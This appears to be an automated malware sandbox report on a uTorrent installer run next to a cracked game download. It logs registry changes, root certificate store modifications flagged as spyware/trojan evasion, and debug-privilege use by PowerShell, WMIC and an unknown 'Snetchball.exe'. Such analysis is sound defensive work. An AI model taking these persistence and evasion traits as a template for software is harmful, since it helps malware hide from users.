Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-appinst C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-app C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btskin\Content Type = "application/x-bittorrent-skin" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\steam C:\Program Files (x86)\Steam\bin\steamservice.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\steamlink\Shell\Open\Command\ = "\"C:\\Program Files (x86)\\Steam\\steam.exe\" -- \"%1\"" C:\Program Files (x86)\Steam\bin\steamservice.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.torrent C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Magnet\shell\open\command C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\bittorrent\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\uTorrent\\uTorrent.exe\" \"%1\" /SHELLASSOC" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-skin\Extension = ".btskin" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btinstall\ = "uTorrent" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btinstall\Content Type = "application/x-bittorrent-appinst" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Torrent\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Roaming\\utorrent\\pro\\resources\\torrent-icon.ico" C:\Users\Admin\AppData\Local\Temp\is-NRQ9F.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\steam\Shell\Open C:\Program Files (x86)\Steam\bin\steamservice.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrentsearchdescription+xml\Extension = ".btsearch" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btapp\ = "uTorrent" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent-skin C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\steam\Shell\Open\Command C:\Program Files (x86)\Steam\bin\steamservice.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Magnet\shell C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btapp C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\steam\ = "URL:steam protocol" C:\Program Files (x86)\Steam\bin\steamservice.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent-app\Extension = ".btapp" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-skin C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-key C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btsearch\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent\Extension = ".torrent" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\shell\open C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Magnet\DefaultIcon C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\steamlink\Shell\Open\Command C:\Program Files (x86)\Steam\bin\steamservice.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\steamlink C:\Program Files (x86)\Steam\bin\steamservice.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\steamlink\Shell\Open C:\Program Files (x86)\Steam\bin\steamservice.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrentsearchdescription+xml C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Magnet\shell\ = "open" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-appinst\Extension = ".btinstall" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Applications\uTorrent.exe\shell\ = "open" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent-appinst\Extension = ".btinstall" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Magnet\URL Protocol C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Magnet\shell\open C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\bittorrent\shell C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btskin C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\steamlink\DefaultIcon C:\Program Files (x86)\Steam\bin\steamservice.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Roaming\\uTorrent\\maindoc.ico" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\uTorrent\\uTorrent.exe\" \"%1\" /SHELLASSOC" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrentsearchdescription+xml C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\bittorrent C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\steam\URL Protocol C:\Program Files (x86)\Steam\bin\steamservice.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\steam\URL Protocol C:\Program Files (x86)\Steam\bin\steamservice.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\Content Type C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.torrent\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrentsearchdescription+xml\Extension = ".btsearch" C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.torrent\Torrent_backup C:\Users\Admin\AppData\Local\Temp\is-NRQ9F.tmp\utorrent.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\503006091D97D4F5AE39F7CBE7927D7D652D3431\Blob C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\SystemCertificates\CA\Certificates\C94DC4831A901A9FEC0FB49B71BD49B5AAD4FAD0 C:\Users\Admin\AppData\Local\Temp\is-5SD8N.tmp\utorrent9.tmp N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\SystemCertificates\CA\Certificates\C94DC4831A901A9FEC0FB49B71BD49B5AAD4FAD0\Blob C:\Users\Admin\AppData\Local\Temp\is-5SD8N.tmp\utorrent9.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\503006091D97D4F5AE39F7CBE7927D7D652D3431 C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\the-longing-codex_m4vY1NvSZ8.zip:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\The.Longing-CODEX\codex-the.longing.iso:Zone.Identifier C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
File opened for modification C:\Users\Admin\Downloads\SteamSetup.exe:Zone.Identifier C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe N/A
